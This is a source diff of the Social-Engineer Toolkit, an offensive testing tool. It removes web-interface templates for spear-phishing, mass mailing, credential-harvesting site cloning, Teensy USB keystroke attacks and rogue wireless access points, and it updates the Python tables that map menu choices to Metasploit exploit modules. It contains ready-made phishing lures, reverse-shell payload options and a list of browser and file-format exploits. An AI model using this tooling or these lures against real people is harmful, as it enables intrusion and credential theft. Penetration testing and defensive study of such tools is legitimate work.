-<option value="18">Nuance PDF Reader v6.0 Launch Stack Buffer Overflow</option>
-<option value="19">Adobe Reader u3D Memory Corruption Vulnerability</option>
-<optionv alue="20">MSCOMCTL ActiveX Buffer Overflow (ms12-027)</option>
-
-</select>
-<br><br>
-<p><b>Payload Selection Options</b></p>
-<select name="payload_selection" STYLE="font-family : arial; font-size : 7pt">
-<option value"1">Windows Shell Reverse TCP</option>
-<option value"2" selected="selected">Windows Reverse TCP Meterpreter</option>
-<option value"3">Windows Reverse TCP VNC DLL</option>
-<option value"4">Windows Bind Shell</option>
-<option value"5">Windows Bind Shell X64</option>
-<option value"6">Windows Shell Reverse TCP X64</option>
-<option value"7">Windows Meterpreter Reverse TCP X64</option>
-<option value"8">Windows Meterpreter Egress Buster</option>
-<option value"9">Windows Meterpreter Reverse HTTPS</option>
-<option value"10">Windows Meterpreter Reverse DNS</option>
-</select>
-<br>
-<br>Import your own: <input type="file" name="payload_selection_filename" size="5" STYLE="font-family : arial; font-size : 7pt">
-<br><br>
-<p><b>Encoding Options</b></p>
-<select name="encoding" STYLE="font-family : arial; font-size : 7pt">
-<option value"1">avoid_utf8_tolower</option>
-<option value"2">shikata_ga_nai</option>
-<option value"3">alpha_mixed</option>
-<option value"4">alpha_upper</option>
-<option value"5">call4_dword_xor</option>
-<option value"6">countdown</option>
-<option value"7">fnstenv_mov</option>
-<option value"8">jmp_call_additive</option>
-<option value"9">nonalpha</option>
-<option value"10">nonupper</option>
-<option value"11">unicode_mixed</option>
-<option value"12">unicode_upper</option>
-<option value"13">alpha2</option>
-<option value"14">No Encoding</option>
-<option value"15">Multi-Encoder</option>
-<option value"16" selected="selected">Backdoored Executable</option>
-</select>
-<br><br>
-<p><b>Default Port for Listener</b></p>
-Enter the default port: <input type="text" name="port" size="7" value="443" STYLE="font-family : arial; font-size : 7pt"/>
-<br><br>
-<p><b>For the Custom SET DLL Hijacking Attack Vector, select application to attack</b></p>
-<br>
-<select name="dll_hijack" STYLE="font-family : arial; font-size : 7pt">
-<option value"1">Windows Address Book (Universal)</option>
-<option value"2">Microsoft Help and Support Center</option>
-<option value"3">Wscript (XP)</option>
-<option value"4">Microsoft Office PowerPoint 2007</option>
-<option value"5">Microsoft Group Converter</option>
-<option value"6">Safari v5.0.1</option>
-<option value"7">FireFox <= 3.6.8</option>
-<option value"8">Microsoft PowerPoint 2010</option>
-<option value"9">Microsoft PowerPoint 2007</option>
-<option value"10">Microsoft Visio 2010</option>
-<option value"11">Microsoft Word 2007</option>
-<option value"12">Microsoft PowerPoint 2007</option>
-<option value"13">Microsoft Windows Media Encoder 9</option>
-<option value"14">Windows 7 and Vista Backup Utility</option>
-<option value"15">Encase</option>
-<option value"16">IBM Rational License Key Administrator</option>
-<option value"17">Microsoft RDP</option>
-</select>
-<br>
-<br>
-<b>NOTE IF YOU SELECTED A PDF EXPLOIT TO CHANGE THE VALUE TO template.pdf</b>
-<br>
-Name of attachment to send <input type="text" name="attachment" size="10" value="template.rar" STYLE="font-family : arial; font-size : 7pt"/>
-<br>
-<br>
-<p><b>Specify if your using mass mailer or single email targets</b></p>
-<input type="checkbox" name="webattack_email" value="1" STYLE="font-family : arial; font-size : 7pt" CHECKED> E-Mail Attack Single Email Address<br>
-<input type="checkbox" name="webattack_email" value="2" STYLE="font-family : arial; font-size : 7pt" > E-Mail Attack Mass Mailer<br>
-<br>
-<br>
-
-<input type="checkbox" name="predefined" value="1" STYLE="font-family : arial; font-size : 7pt">Predefined template<br>
-<select name="template" STYLE="font-family : arial; font-size : 7pt">
-<option value="1">  New Update</option>
-<option value="2">  Computer Issue</option>
-<option value="3">  Strange internet usage</option>
-<option value="4">  LOL..have to check this out...</option>
-<option value="5">  Status Report</option>
-<option value="6">  Pay Raise Application Form</option>
-<option value="7">  WOAAAA!!!!!! This is crazy...</option>
-<option value="8">  Basketball Tickets</option>
-<option value="9">  Baby Pics</option>
-<option value="10"> Have you seen this?</option>
-<option value="11"> Termination List</option>
-<option value="12"> How long has it been?</option>
-<option value="13"> Dan Brown's Angels & Demons</option>
-</select>
-<br><br>
-<input type="checkbox" name="predefined" value="2" STYLE="font-family : arial; font-size : 7pt">Use a one time template<br>
-Enter your email message here<br><TEXTAREA NAME="message" COLS=100 ROWS=15 STYLE="font-family : arial; font-size : 7pt"></TEXTAREA> 
-<br><br>
-
-
-If your using mass emailer, browse to file with email addresses: <input type="file" name="massmailer_file" size="5">
-<br>
-<br>
-Enter who you want to send the email to: <input type="text" name="emailto" STYLE="font-family : arial; font-size : 7pt" /><br />
-<br><br>
-<input type="checkbox" name="webattack_account" value="1"STYLE="font-family : arial; font-size : 7pt" CHECKED> Use a GMAIL to send the email out<br>
-<input type="checkbox" name="webattack_account" value="2" STYLE="font-family : arial; font-size : 7pt" > Use your own open-relay SMTP Server<br>
-<br><br>
-<p><b>THIS OPTION FOR OPEN-RELAY ONLY</b></p>
-<br>
-Enter your email address you want to come from: <input type="text" name="emailfrom_relay" STYLE="font-family : arial; font-size : 7pt"/><br />
-Enter your username for open relay (leave blank if there is none): <input type="text" name="username_relay" STYLE="font-family : arial; font-size : 7pt"/><br />
-Enter your password for open relay (leave blank if there is none): <input type="password" name="password_relay" STYLE="font-family : arial; font-size : 7pt" /><br />
-Enter the SMTP Server address for the open relay: <input type="text" name="smtp_relay" STYLE="font-family : arial; font-size : 7pt" /><br/>
-Enter the port number for the SMTP server: <input type="text" name="smtp_port_relay" value="25" size="3" STYLE="font-family : arial; font-size : 7pt" /><br/>
-<br><br>
-<p><b>THIS OPTION FOR GMAIL ATTACK ONLY!</b></p><br>
-Enter your email address: <input type="text" name="emailfrom" STYLE="font-family : arial; font-size : 7pt"/><br />
-Enter your password for the email address: <input type="password" name="password" STYLE="font-family : arial; font-size : 7pt"/><br />
-<br><br>
-<p><b>Required fields below for custom template</b></p>
-Enter the subject for the email: <input type="text" name="subject" STYLE="font-family : arial; font-size : 7pt"/><br />
-<br><br>
-<CHECKHERE>
-
-<input type="submit" value="Launch Attack" STYLE="font-family : arial; font-size : 7pt">
-</form>
-			</div>  
-		</div> 
-		
-		
-		<br><br>	
-	</div> 

src/commandcenter/post.site

@@ -1,11 +0,0 @@
-				
-		<div class="post">
-		<h4 class="dates">Social-Engineer Toolkit (SET) Action has completed.</h4>
-			<div class="entry">
-				<h2>Social-Engineer Toolkit (SET)</h2>
-				
-				<p>Your action has been submitted through SET, check your console session for more information.</p>		
-			</div>  
-		</div> 
-		<br><br>	
-	</div> 

src/commandcenter/self_signed.site

@@ -1,16 +0,0 @@
-<br><br>
-<p><b>Self-Signed Applet is turned to ON, enter information for the java certificate (java applet and multi-attack ONLY)</b><p>
-<br>
-What is your First and Last Name: <input type="text" name="firstname" size="10" /><br />
-<br>
-What is the name of your organization unit: <input type="text" name="orgunit" size="10" /><br />
-<br>
-What is the name of your organization: <input type="text" name="orgname" size="10" /><br />
-<br>
-What is the name of your city or locality: <input type="text" name="city" size="10" /><br />
-<br>
-What is the name of your state or province: <input type="text" name="state" size="10" /><br />
-<br>
-What is the two letter code for your country ex. US: <input type="text" name="country" size="2" /><br />
-<br>
-

src/commandcenter/social_engineering.site

@@ -1,25 +0,0 @@
-				
-		<div class="post">
-		<h4 class="dates">The Social-Engineer Toolkit (SET) SE Attacks</h4>
-			<div class="entry">
-				<h2>SET - Social-Engineering Attacks - Web Interface</h2>
-				<p>
-Welcome to the Social-Engineer Toolkit - Social-Engineering attack vectors. These will list all of the attack vectors available through the SET interface.
-<br>
-<br><b>Select the attack vector you want:</b>
-<br><br>
-<a href="/phish">Spear-Phishing Attack Vector</a><br><br>
-<a href="/web_attack">Website Attack Vector</a><br><br>
-<a href="/infect">Infectious Media Generator</a><br><br>
-<a href="/mass_mailer">Mass Mailer Attack</a><br><br>
-<a href="/teensy">Arduino-Based Attack Vector</a><br><br>
-<a href="/wireless">Wireless Access Point Attack Vector</a><br><br>
-Select the attack vector that you want to perform. 
-</p>
-		
-			</div>  
-		</div> 
-		
-		
-		<br><br>	
-	</div> 

src/commandcenter/teensy.site

@@ -1,105 +0,0 @@
-		<div class="post">
-		<h4 class="dates">Social-Engineer Toolkit (SET) Teensy Vector</h4>
-			<div class="entry">
-				<h2>Teensy Attack Vector Options</h2>
-Welcome to the Social-Engineer Toolkit web interface, be sure to only select what is applicable to your attack. For example for Credential Harvester you would only select the attack method and which site to clone.<br><br>
-Special thanks to: IronGeek, WinFang, and Garland
-<br><br>
-The Teensy HID Attack Vector utilizes the teensy USB device to
-program the device to act as a keyboard. Teensy's have onboard
-storage and can allow for remote code execution on the physical
-system. Since the devices are registered as USB Keyboard's it
-will bypass any autorun disabled or endpoint protection on the
-system.
-<br><br>
-You will need to purchase the Teensy USB device, it's roughly
-$22 dollars. This attack vector will auto generate the code
-needed in order to deploy the payload on the system for you.
-<br><br>
-This attack vector will create the .pde files necessary to import
-into Arduino (the IDE used for programming the Teensy). The attack
-vectors range from Powershell based downloaders, wscript attacks,
-and other methods.
-<br><br>
-For more information on specifications and good tutorials visit:
-<br><br>
-http://www.irongeek.com/i.php?page=security/programmable-hid-usb-keystroke-dongle
-<br><br>
-To purchase a Teensy, visit: http://www.pjrc.com/store/teensy.html
-<br>
-<br><p><b>Teensy Attack Methods</b></p>
-
-<form action="/teensy_post" method="POST">
-
-
-<style type="text/css">
-option {
- color: white;
- background-color: black;
-}
-</style>
-<FONT FACE="sans serif" size="3">
-
-<select name="attack" STYLE="font-family : arial; font-size : 7pt">
-<option value="1">Powershell HTTP GET MSF Payload</option>
-<option value="2">WSCRIPT HTTP GET MSF Payload</option>
-<option value="3">Powershell based Reverse Shell</option>
-<option value="4">IE Beef Jacking</option>
-<option value="5">Malicious Java Accept</option>
-<option value="6">Gnome wget Download Payload</option>
-<option value="7">Binary 2 Teensy Attack (Deploy MSF payloads)</option>
-<option value="8">SDCard 2 Teensy Attack (Deploy Any EXE)</option>
-<option value="9">SDCard 2 Teensy Attack (Deploy on OSX)</option>
-<option value="10">X10 Arduino Sniffer PDE and Libraries</option>
-option value="11">X10 Arduino Jammer PDE and Libraries</option>
-</select>
-<br>
-<br><p><b>Payload options:</b><p>
-<select name="payload" STYLE="font-family : arial; font-size : 7pt">
-<option value="1">Windows Shell Reverse TCP</option>
-<option value="2" selected="selected">Windows Reverse TCP Meterpreter</option>
-<option value="3">Windows Reverse TCP VNC DLL</option>
-<option value="4">Windows Bind Shell</option>
-<option value="5">Windows Bind Shell X64</option>
-<option value="6">Windows Shell Reverse TCP X64</option>
-<option value="7">Windows Meterpreter Reverse TCP X64</option>
-<option value="8">Windows Meterpreter Egress Buster</option>
-<option value="9">Windows Meterpreter Reverse HTTPS</option>
-<option value="10">Windows Meterpreter Reverse DNS</option>
-</select>
-<br>
-<br>Import your own: <input type="file" name="payload_selection" size="5" STYLE="font-family : arial; font-size : 7pt">
-<br><br>
-<p><b>Encoding Options</b></p>
-<select name="encoding" STYLE="font-family : arial; font-size : 7pt">
-<option value="1">avoid_utf8_tolower</option>
-<option value="2">shikata_ga_nai</option>
-<option value="3">alpha_mixed</option>
-<option value="4">alpha_upper</option>
-<option value="5">call4_dword_xor</option>
-<option value="6">countdown</option>
-<option value="7">fnstenv_mov</option>
-<option value="8">jmp_call_additive</option>
-<option value="9">nonalpha</option>
-<option value="10">nonupper</option>
-<option value="11">unicode_mixed</option>
-<option value="12">unicode_upper</option>
-<option value="13">alpha2</option>
-<option value="14">No Encoding</option>
-<option value="15">Multi-Encoder</option>
-<option value="16" selected="selected">Backdoored Executable</option>
-</select>
-
-<br><br>
-<p><b>Default Port for Listener</b></p>
-Enter the default port: <input type="text" name="port" size="7" value="443" STYLE="font-family : arial; font-size : 7pt"/>
-<br><br>
-<CHECKHERE>
-<br><br><input type="submit" value="Launch Attack" STYLE="font-family : arial; font-size : 7pt">
-</form>
-			</div>  
-		</div> 
-		
-		
-		<br><br>	
-	</div> 

src/commandcenter/update.site

@@ -1,26 +0,0 @@
-		<div class="post">
-		<h4 class="dates">The Social-Engineer Toolkit (SET) Updates</h4>
-			<div class="entry">
-				<h2>Update Options</h2>
-Welcome to the Social-Engineer Toolkit web interface, be sure to only select what is applicable to your attack.<br><br>
-<br><p><b>Update Options</b></p>
-<form action="/updates_post" method="POST">
-<input type="checkbox" name="updates_main" value="1"> Update The Social-Engineer Toolkit (SET)<br>				
-<input type="checkbox" name="updates_main" value="2"> Update The Metasploit Framework<br>
-<input type="checkbox" name="updates_main" value="3"> Update Everything<br>
-<br><br><input type="submit" value="Perform Updates"></form>
-<br><br>
-<br><p><b>Configuration Editor</b></p>
-This menu will allow you to dynamically edit the configuration file for the SET configuration.
-<br><br>
-<form action="/update_config_post" method="POST">
-CONFIGEDITORHERE
-<br>
-<input type="submit" value="Update Configuration">
-</form>
-			</div>  
-		</div> 
-		
-		
-		<br><br>	
-	</div> 

src/commandcenter/web_attack.site

@@ -1,129 +0,0 @@
-		<div class="post">
-		<h4 class="dates">Social-Engineer Toolkit (SET) Web-Attack Vector</h4>
-			<div class="entry">
-				<h2>Web-Attack Vector Options</h2>
-Welcome to the Social-Engineer Toolkit web interface, be sure to only select what is applicable to your attack. For example for Credential Harvester you would only select the attack method and which site to clone. If you were using something different like the Java Applet Attack Vector you would select the attack, site to clone, payload, encoding, etc.<br><br>
-<br><p><b>Web Attack Methods</b></p>
-<form action="/web_attack_post" method="POST">
-
-<select name="attack" STYLE="font-family : arial; font-size : 7pt">
-<option value="1">Java Applet Attack Vector</option>
-<option value="2">Metasploit Browser Exploit Method</option>
-<option value="3">Credential Harvester Attack Method</option>
-<option value="4">Tabnabbing Attack Method</option>
-<option value="5">Man Left in the Middle Attack Method</option>
-<option value="6">Web Jacking Attack Method</option>
-<option value="7">Multi-Attack Web Method</option>
-</select>
-
-<br><br>
-<p><b>Site Cloning Menu</b></p>
-Site to clone: <input type="text" name="cloner" STYLE="font-family : arial; font-size : 7pt" /><br />
-<br><br>
-<p><b>Metasploit Browser Attack Exploit (Multi-Attack and Client-Side Attack ONLY) (select one)</b></p>
-<select name="browser" STYLE="font-family : arial; font-size : 7pt">
-
-<option value="1" selected="selected">Java AtomicReferenceArray Type Violation Vulnerability</option>
-<option value="2">Java Applet Field Bytecode Verifier Cache Remote Code Execution</option>
-<option value="3">MS12-037 Internet Explorer Same ID Property Deleted Object Handling Memory Corruption</option>
-<option value="4">Microsoft XML Core Services MSXML Uninitialized Memory Corruption</option>
-<option value="5">Adobe Flash Player Object Type Confusion</option>
-<option value="6">Adobe Flash Player MP4 'cprt' Overflow</option>
-<option value="7">MS12-004 midiOutPlayNextPolyEvent Heap Overflow</option>
-<option value="8">Java Applet Rhino Script Engine Remote Code Execution</option>
-<option value="9">MS11-050 IE mshtml!CObjectElement Use After Free</option>
-<option value="10">Adobe Flash PLayer 10.2.143.1 SWF Memory Corruption Vulnerability</option>
-<option value="11">Cisco AnyConnect VPN Client ActiveX URL Property Download and Execute</option>
-<option value="12">Internet Explorer CSS Import Use After Free</option>
-<option value="13">Microsoft WMI Administration Tools ActiveX Buffer Overflow</option>
-<option value="14">Internet Explorer CSS Tags Memory Corruption</option>
-<optionv alue="15">Sun Java Applet2ClassLoader Remote Code Execution</option>
-<option value="16">Sun Java Runtime New Plugin docbase Buffer Overflow</option>
-<option value="17">Microsoft WebDav Application DLL Hijacker</option>
-<option value="18">Adobe Flash Player AVM Bytecode Verification Vulnerability</option>
-<option value="19">Adobe Shockwave rcsL Memory Corruption Exploit</option>
-<option value="20">Adobe CoolType SING Table 'uniqueName'</option>
-<option value="21">Apple QuickTime 7.6.7 Marshaled_pUnk</option>
-<option value="22">Microsoft Help Center XSS (MS10-042)</option>
-<option value="23">Microsoft Internet Explorer iepeers.dll (MS10-018)</option>
-<option value="24">Microsoft Internet Explorer Tabular Data Control (MS10-018)</option>
-<option value="25">Microsoft Internet Explorer "Aurora" Memory Corruption (MS10-002)</option>
-<option value="26">Microsoft Internet Explorer 7 Uninitialized Mem Corruption (MS09-002)</option>
-<option value="27">Microsoft Internet Explorer Style getElementsbyTagName (MS09-072)</option>
-<option value="28">Microsoft Internet Explorer isComponentInstalled Overflow</option>
-<option value="29">Microsoft Internet Explorer Data Binding (MS08-078)</option>
-<option value="30">Mcirosoft Internet Explorer Unsane Scripting Misconfiguration</option>
-<option value="31">FireFox 3.5 escape Return Value Memory Corruption</option>
-<option value="32">FireFox 3.6.16 mChannel use after free vulnerability</option>
-<option value="33">Metasploit Browser Autopwn (USE AT OWN RISK!)</option>
-</select>
-
-<br>
-<br><p><b>Payload options (only for Java Applet, Metasploit Browser, and Multi-Attack) (select one)</b><p>
-<select name="payload_selection" STYLE="font-family : arial; font-size : 7pt">
-<option value="1">Windows Shell Reverse TCP</option>
-<option value="2" selected="selected">Windows Reverse TCP Meterpreter</option>
-<option value="3">Windows Reverse TCP VNC DLL</option>
-<option value="4">Windows Bind Shell</option>
-<option value="5">Windows Bind Shell X64</option>
-<option value="6">Windows Shell Reverse TCP X64</option>
-<option value="7">Windows Meterpreter Reverse TCP X64</option>
-<option value="8">Windows Meterpreter Egress Buster</option>
-<option value="9">Windows Meterpreter Reverse HTTPS</option>
-<option value="10">Windows Meterpreter Reverse DNS</option>
-<option value="11">SE Toolkit Interactive Command Shell (Java Applet Only)</option>
-<option value="12">SE Toolkit HTTP Reverse Shell</option>
-<option value="13">RATTE HTTP Tunneling Payload (Java Applet Only)</option>
-<option value="14">ShellCodeExec Alphanum Shellcode </option>
-</select>
-<br>
-<br>Import your own: <input type="file" name="payload_selection_filename" size="5" STYLE="font-family : arial; font-size : 7pt">
-<br><br>
-<p><b>Encoding Options</b></p>
-<select name="encoding" STYLE="font-family : arial; font-size : 7pt">
- <option value="1">avoid_utf8_tolower</option>
-<option value="2">shikata_ga_nai</option>
-<option value="3">alpha_mixed</option>
-<option value="4">alpha_upper</option>
-<option value="5">call4_dword_xor</option>
-<option value="6">countdown</option>
-<option value="7">fnstenv_mov</option>
-<option value="8">jmp_call_additive</option>
-<option value="9">nonalpha</option>
-<option value="10">nonupper</option>
-<option value="11">unicode_mixed</option>
-<option value="12">unicode_upper</option>
-<option value="13">alpha2</option>
-<option value="14">No Encoding</option>
-<option value="15">Multi-Encoder</option>
-<option value="16" selected="selected">Backdoored Executable</option>
-</select>
-
-<br><br>
-<p><b>Default Port for Listener</b></p>
-Enter the default port: <input type="text" name="port" size="7" value="443" STYLE="font-family : arial; font-size : 7pt"/>
-<br><br>
-<br><p><b>Java Applet ONLY - Additional Targets</b><p>
-<input type="checkbox" name="osxlinuxtarget" value="osx"> Target OSX and Linux<br>
-Enter the default port OSX: <input type="text" name="portosx" size="7" value="8080" STYLE="font-family : arial; font-size : 7pt"/><br><br>
-Enter the default port Linux: <input type="text" name="portlin" size="7" value="8081" STYLE="font-family : arial; font-size : 7pt"/>
-<br><br>
-<p><b>Multi-Attack Vector Only - Do not use this unless Multi-Attack Vector is enabled.</b</p>
-<input type="checkbox" name="multiattack1" value="1"> Java Applet Attack Method<br>
-<input type="checkbox" name="multiattack2" value="2"> Metasploit Browser Exploit Method<br>
-<input type="checkbox" name="multiattack3" value="3"> Credential Harvester Attack Method<br>
-<input type="checkbox" name="multiattack4" value="4"> Tabnabbing Attack Method<br>
-<input type="checkbox" name="multiattack5" value="5"> Man Left in the Middle Attack Method<br>
-<input type="checkbox" name="multiattack6" value="6"> Web Jacking Attack Method<br>
-<input type="checkbox" name="multiattack7" value="7"> Use them all - A.K.A. 'Tactical Nuke'<br>
-
-<CHECKHERE>
-
-<br><br><input type="submit" value="Launch Attack" STYLE="font-family : arial; font-size : 7pt">
-</form>
-			</div>  
-		</div> 
-		
-		
-		<br><br>	
-	</div> 

src/commandcenter/webattack_email.site

@@ -1,34 +0,0 @@
-<br><br>
-<p><b>Mass Mailer Options for the Social-Engineer Toolkit (SET)</b><p>
-<input type="checkbox" name="webattack_email" value="1"> E-Mail Attack Single Email Address<br>				
-<input type="checkbox" name="webattack_email" value="2"> E-Mail Attack Mass Mailer<br>
-<br>
-If your using mass emailer, browser to file with email addresses: <input type="file" name="massmailer_file" size="5">
-<br>
-<br>
-Enter who you want to send the email to: <input type="text" name="emailto" /><br />
-<br><br>
-<input type="checkbox" name="webattack_account" value="1" STYLE="font-family : arial; font-size : 7pt" > Use a GMAIL account for your email attack<br>
-<input type="checkbox" name="webattack_account" value="2" STYLE="font-family : arial; font-size : 7pt" > Use your own open-relay SMTP Server<br>
-<br><br>
-<p><b>THIS OPTION FOR OPEN-RELAY ONLY</b></p>
-<br>
-Enter your email address you want to come from: <input type="text" name="emailfrom_relay" STYLE="font-family : arial; font-size : 7pt" /><br />
-Enter your username for open relay (leave blank if there is none): <input type="text" name="username_relay" STYLE="font-family : arial; font-size : 7pt" /><br />
-Enter your password for open relay (leave blank if there is none): <input type="password" name="password_relay" STYLE="font-family : arial; font-size : 7pt" /><br />
-Enter the SMTP Server address for the open relay: <input type="text" name="smtp_relay" STYLE="font-family : arial; font-size : 7pt" /><br/>
-Enter the port number for the SMTP server: <input type="text" name="smtp_port_relay" value="25" size="3" STYLE="font-family : arial; font-size : 7pt" /><br/>
-<br><br>
-<p><b>THIS OPTION FOR GMAIL ATTACK ONLY!</b></p><br>
-Enter your email address: <input type="text" name="emailfrom" STYLE="font-family : arial; font-size : 7pt" /><br />
-Enter your password for the email address: <input type="password" name="password" STYLE="font-family : arial; font-size : 7pt" /><br />
-<br><br>
-<p><b>Required fields below</b></p>
-Enter the subject for the email: <input type="text" name="subject" STYLE="font-family : arial; font-size : 7pt" /><br />
-<br><br>
-<input type="checkbox" name="webattack_message" value="1" STYLE="font-family : arial; font-size : 7pt"> Use HTML for the email attack<br>
-<input type="checkbox" name="webattack_message" value="2" STYLE="font-family : arial; font-size : 7pt"> Use Plain text for the email attack<br>
-<br><br>
-Enter your email message here<br><TEXTAREA NAME="comments" COLS=40 ROWS=6 STYLE="font-family : arial; font-size : 7pt"></TEXTAREA>
-<br>
-

src/commandcenter/wireless.site

@@ -1,31 +0,0 @@
-		<div class="post">
-		<h4 class="dates">The Social-Engineer Toolkit (SET) Wireless Attack Vector</h4>
-			<div class="entry">
-				<h2>Wireless Access Point Attack Vector</h2>
-Welcome to the Wireless Attack Vector, this will create an access point leveraging
-your wireless card and redirect all DNS queries to you. The concept is fairly simple,
-SET will create a wireless access point, dhcp server, and spoof DNS to redirect traffic
-to the attacker machine. It will then exit out of that menu with everything running as
-a child process.
-<br><br>
-You can then launch any SET attack vector you want, for example the Java Applet attack and
-when a victim joins your access point and tries going to a website, will be redirected to
-your attacker machine.
-<br><br>
-This attack vector uses AirBase-NG, AirMon-NG, DNSSpoof, and dhcpd3 to work properly.
-<br>
-<br><p><b>Wireless Options</b></p>
-<form action="/wireless_post" method="POST">
-<input type="checkbox" name="wireless" value="1"> Start the SET Wireless Attack Vector Access Point<br>				
-<input type="checkbox" name="wireless" value="2"> Stop the SET Wireless Attack Vector Access Point<br>
-<br><br>
-Enter your wifi interface: <input type="text" name="wifi_interface" STYLE="font-family : arial; font-size : 7pt"/><br />
-<br><br>
-<input type="submit" value="Launch Attack"></form>
-</form>
-			</div>  
-		</div> 
-		
-		
-		<br><br>	
-	</div> 

src/core/dictionaries.py

@@ -24,6 +24,8 @@ def ms_module(exploit):
     """ Receives the input given by the user from gen_payload.py """
 
     return {
+            '1':"exploit/windows/browser/ms14_012_cmarkup_uaf",
+            '2':"exploit/windows/browser/ms14_012_textrange",
             '1':"exploit/windows/browser/ms13_080_cdisplaypointer",
             '2':"exploit/windows/browser/ie_setmousecapture_uaf",
             '3':"exploit/multi/browser/java_jre17_jmxbean_2",
@@ -136,24 +138,25 @@ def ms_attacks(exploit):
     return {
             '1':"dll_hijacking",
             '2':"unc_embed",
-            '3':"exploit/windows/fileformat/ms11_006_createsizeddibsection",
-            '4':"exploit/windows/fileformat/ms10_087_rtf_pfragments_bof",
-            '5':"exploit/windows/fileformat/adobe_flashplayer_button",
-            '6':"exploit/windows/fileformat/adobe_cooltype_sing",
-            '7':"exploit/windows/fileformat/adobe_flashplayer_newfunction",
-            '8':"exploit/windows/fileformat/adobe_collectemailinfo",
-            '9':"exploit/windows/fileformat/adobe_geticon",
-            '10':"exploit/windows/fileformat/adobe_jbig2decode",
-            '11':"exploit/windows/fileformat/adobe_pdf_embedded_exe",
-            '12':"exploit/windows/fileformat/adobe_utilprintf",
-            '13':"custom/exe/to/vba/payload",
-            '14':"exploit/windows/fileformat/adobe_u3d_meshdecl",
-            '15':'exploit/windows/fileformat/adobe_pdf_embedded_exe_nojs',
-            '16':"exploit/windows/fileformat/foxit_title_bof",
-            '17':"exploit/windows/fileformat/apple_quicktime_pnsize",
-            '18':"exploit/windows/fileformat/nuance_pdf_launch_overflow",
-            '19':"exploit/windows/fileformat/adobe_reader_u3d",
-            '20':"exploit/windows/fileformat/ms12_027_mscomctl_bof",
+            '3':"exploit/windows/fileformat/ms14_017_rtf",
+            '4':"exploit/windows/fileformat/ms11_006_createsizeddibsection",
+            '5':"exploit/windows/fileformat/ms10_087_rtf_pfragments_bof",
+            '6':"exploit/windows/fileformat/adobe_flashplayer_button",
+            '7':"exploit/windows/fileformat/adobe_cooltype_sing",
+            '8':"exploit/windows/fileformat/adobe_flashplayer_newfunction",
+            '9':"exploit/windows/fileformat/adobe_collectemailinfo",
+            '10':"exploit/windows/fileformat/adobe_geticon",
+            '11':"exploit/windows/fileformat/adobe_jbig2decode",
+            '12':"exploit/windows/fileformat/adobe_pdf_embedded_exe",
+            '13':"exploit/windows/fileformat/adobe_utilprintf",
+            '14':"custom/exe/to/vba/payload",
+            '15':"exploit/windows/fileformat/adobe_u3d_meshdecl",
+            '16':'exploit/windows/fileformat/adobe_pdf_embedded_exe_nojs',
+            '17':"exploit/windows/fileformat/foxit_title_bof",
+            '18':"exploit/windows/fileformat/apple_quicktime_pnsize",
+            '19':"exploit/windows/fileformat/nuance_pdf_launch_overflow",
+            '20':"exploit/windows/fileformat/adobe_reader_u3d",
+            '21':"exploit/windows/fileformat/ms12_027_mscomctl_bof",
             }.get(exploit,"INVALID")
 
 def teensy_config(choice):
@@ -176,9 +179,9 @@ def webattack_vector(attack_vector):
             '2':"browser",
             '3':"harvester",
             '4':"tabnapping",
-            '5':"mlitme",
-            '6':"webjacking",
-            '7':"multiattack"
+            '5':"webjacking",
+            '6':"multiattack",
+            '7':"fsattack"
             }.get(attack_vector,"ERROR")
 
 
@@ -223,4 +226,5 @@ def category(category):
             '30':"delldrac",
             '31':"ridenum",
             '32':"psexec",
+            '33':"fsattack",
            }.get(category,"ERROR")

src/core/fasttrack.py

@@ -52,7 +52,7 @@ try:
                             print_error("File not found! Please type in the path to the file correctly.")
                         else:
                             break            
-                if choice == "1": port = ""                   
+                if choice == "1": port = "1433"                   
                 if choice == "2": port = "1433"
                 # ask for a wordlist
                 wordlist = raw_input(setprompt(["19","21","22"], "Enter path to a wordlist file [use default wordlist]"))
@@ -174,7 +174,7 @@ try:
                                 # if we equal the number used above
                                 if counter == int(select_server):
                                         #  ipaddr + "," + username + "," + str(port) + "," + passwords
-                                    print "\nHow do you want to deploy the binary via debug (win2k, winxp, win2003) and/or powershell (vista,win7) or just a shell\n\n   1. Deploy Backdoor to System\n   2. Standard Windows Shell\n\n   99. Return back to the main menu.\n"
+                                    print "\nHow do you want to deploy the binary via debug (win2k, winxp, win2003) and/or powershell (vista,win7,2008,2012) or just a shell\n\n   1. Deploy Backdoor to System\n   2. Standard Windows Shell\n\n   99. Return back to the main menu.\n"
                                     option = raw_input(setprompt(["19","21","22"], "Which deployment option do you want [1]"))
                                     if option == "": option = "1"
                                     # if 99 then break

src/core/menu/text.py

@@ -1,8 +1,9 @@
 #!/usr/bin/env python
-#try:
-#    import readline
-#except:
-#    pass
+########################################################################
+#
+# text menu for set menu stuff
+#
+########################################################################
 from src.core.setcore import bcolors, get_version, check_os, meta_path
 
 # grab version of SET
@@ -62,7 +63,7 @@ webattack_menu = ['Java Applet Attack Method',
                   'Tabnabbing Attack Method',
                   'Web Jacking Attack Method',
                   'Multi-Attack Web Method',
-                  'Create or import a CodeSigning Certificate',
+                  'Full Screen Attack Method',
                   '0D']
 
 fasttrack_menu = ['Microsoft SQL Bruter',
@@ -117,9 +118,9 @@ The """ + bcolors.BOLD + """Credential Harvester""" + bcolors.ENDC + """ method
 
 The """ + bcolors.BOLD + """TabNabbing""" + bcolors.ENDC + """ method will wait for a user to move to a different tab, then refresh the page to something different.
 
-The """ + bcolors.BOLD + """Web-Jacking Attack""" + bcolors.ENDC + """ method was introduced by white_sheep, Emgent and the Back|Track team. This method utilizes iframe replacements to make the highlighted URL link to appear legitimate however when clicked a window pops up then is replaced with the malicious link. You can edit the link replacement settings in the set_config if its too slow/fast.
+The """ + bcolors.BOLD + """Web-Jacking Attack""" + bcolors.ENDC + """ method was introduced by white_sheep, emgent. This method utilizes iframe replacements to make the highlighted URL link to appear legitimate however when clicked a window pops up then is replaced with the malicious link. You can edit the link replacement settings in the set_config if its too slow/fast.
 
-The """ + bcolors.BOLD + """Multi-Attack""" + bcolors.ENDC + """ method will add a combination of attacks through the web attack menu. For example you can utilize the Java Applet, Metasploit Browser, Credential Harvester/Tabnabbing, and the Man Left in the Middle attack all at once to see which is successful.
+The """ + bcolors.BOLD + """Multi-Attack""" + bcolors.ENDC + """ method will add a combination of attacks through the web attack menu. For example you can utilize the Java Applet, Metasploit Browser, Credential Harvester/Tabnabbing all at once to see which is successful.
 """)
 
 webattack_vectors_menu = ['Web Templates',
@@ -302,6 +303,7 @@ payload_menu_3 = [
 create_payloads_menu = [
 'SET Custom Written DLL Hijacking Attack Vector (RAR, ZIP)',
 'SET Custom Written Document UNC LM SMB Capture Attack',
